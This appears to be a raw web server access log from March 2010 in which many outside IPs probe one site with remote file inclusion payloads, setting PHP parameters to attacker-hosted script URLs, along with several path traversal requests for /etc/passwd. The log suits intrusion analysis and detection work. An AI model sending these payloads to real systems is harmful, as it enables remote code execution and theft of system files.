66.103.131.81 - - [01/Mar/2010:12:04:16 -0800] "GET /board/bbs/write_update.php?board_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:04:49 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:04:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:04:49 -0800] "GET /logs/access_100131.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:05:02 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:05:02 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:05:02 -0800] "GET /logs/access_100131.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:05:44 -0800] "GET /logs/access_100221.log%20%20//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:05:44 -0800] "GET /logs//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:12:06:11 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:06:37 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:03 -0800] "GET /logs/access_100219.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:03 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:15 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:15 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:07:15 -0800] "GET /logs/access_100219.log//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:07:16 -0800] "GET /logs/access_100215.log//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.2.23 - - [01/Mar/2010:12:07:19 -0800] "GET /logs/access_100125.log%20%20/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:07:20 -0800] "GET /logs/access_100219.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:07:58 -0800] "GET /logs/access_100219.log//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [01/Mar/2010:12:08:02 -0800] "GET /logs/access_100215.log//private/server/////bbs/write_update.php?board_skin_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:08:19 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [01/Mar/2010:12:08:37 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [01/Mar/2010:12:08:37 -0800] "GET /logs/access_100202.log%20%20/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [01/Mar/2010:12:08:37 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:12:09:00 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [01/Mar/2010:12:09:09 -0800] "GET /logs/access_100125.log%20%20/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:12:12:32 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:12:12:56 -0800] "GET /logs/access_100219.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:12:13:22 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:42 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:42 -0800] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:44 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:47 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:54 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:54 -0800] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:13:55 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:12:14:37 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.72.243.72 - - [01/Mar/2010:12:15:24 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://worldcup-2010.co.tv/script/satu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:46 -0800] "GET /logs/access_100217.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:46 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:47 -0800] "GET /write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:51 -0800] "GET /delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:51 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:15:51 -0800] "GET /logs/access_100217.log/delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:13 -0800] "GET /logs/access_100206.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:13 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:14 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:16:23 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:16:24 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:41 -0800] "GET /logs/access_100206.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:41 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:16:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:17:04 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:17:50 -0800] "GET /inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:17:50 -0800] "GET /logs//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:17:50 -0800] "GET /logs/access_100201.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:23 -0800] "GET /inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:23 -0800] "GET /logs/access_100201.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:23 -0800] "GET /logs//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:36 -0800] "GET /logs//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:36 -0800] "GET /inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:36 -0800] "GET /logs/access_100218.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:38 -0800] "GET /inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:38 -0800] "GET /logs/access_100218.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:38 -0800] "GET /logs//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:39 -0800] "GET /logs/access_100129.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:12:19:45 -0800] "GET /logs/access_100129.log%20%20//inc/sys.php?DROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:20:19 -0800] "GET /logs//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:20:19 -0800] "GET /logs/access_100218.log%20%20//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:20:19 -0800] "GET /inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:20:22 -0800] "GET /logs/access_100129.log%20%20//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:12:20:46 -0800] "GET /logs/access_100219.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:15 -0800] "GET /logs/access_100218.log//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:15 -0800] "GET /inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:15 -0800] "GET /logs//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:18 -0800] "GET /logs//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:18 -0800] "GET /inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:18 -0800] "GET /logs/access_100201.log%20%20//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:21:22 -0800] "GET /logs/access_100129.log//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:12:22:25 -0800] "GET /logs/access_100221.log//private/server/logs//bbs//////good.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:22:43 -0800] "GET /logs/access_100217.log//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:12:22:46 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:12:22:46 -0800] "GET /errors.php?error=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
174.36.141.218 - - [01/Mar/2010:12:23:08 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:12:24:06 -0800] "GET /logs/access_100202.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:24:53 -0800] "GET /logs/access_100130.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:24:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:24:55 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:20 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:20 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:21 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:24 -0800] "GET /logs/access_100206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:24 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:25:25 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:12:25:27 -0800] "GET /logs/access_100210.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:12:25:27 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:12:25:27 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:12:26:29 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:12:26:54 -0800] "GET /logs/access_100213.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:27:12 -0800] "GET /logs/access_100221.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:27:53 -0800] "GET /logs/access_100221.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:12:28:04 -0800] "GET /logs/access_100212.log%20%20//rsgallery.html.php?mosConfig_absolute_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:28:17 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:28:50 -0800] "GET /logs/access_100221.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:28:55 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:29:33 -0800] "GET /logs/access_100221.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:29:35 -0800] "GET /logs/access_100124.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:29:35 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:12:29:35 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:34:27 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:34:27 -0800] "GET /logs/access_100224.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:34:29 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:34:38 -0800] "GET /logs/access_100220.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [01/Mar/2010:12:34:58 -0800] "GET /logs/access_100201.log//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:12:39:01 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
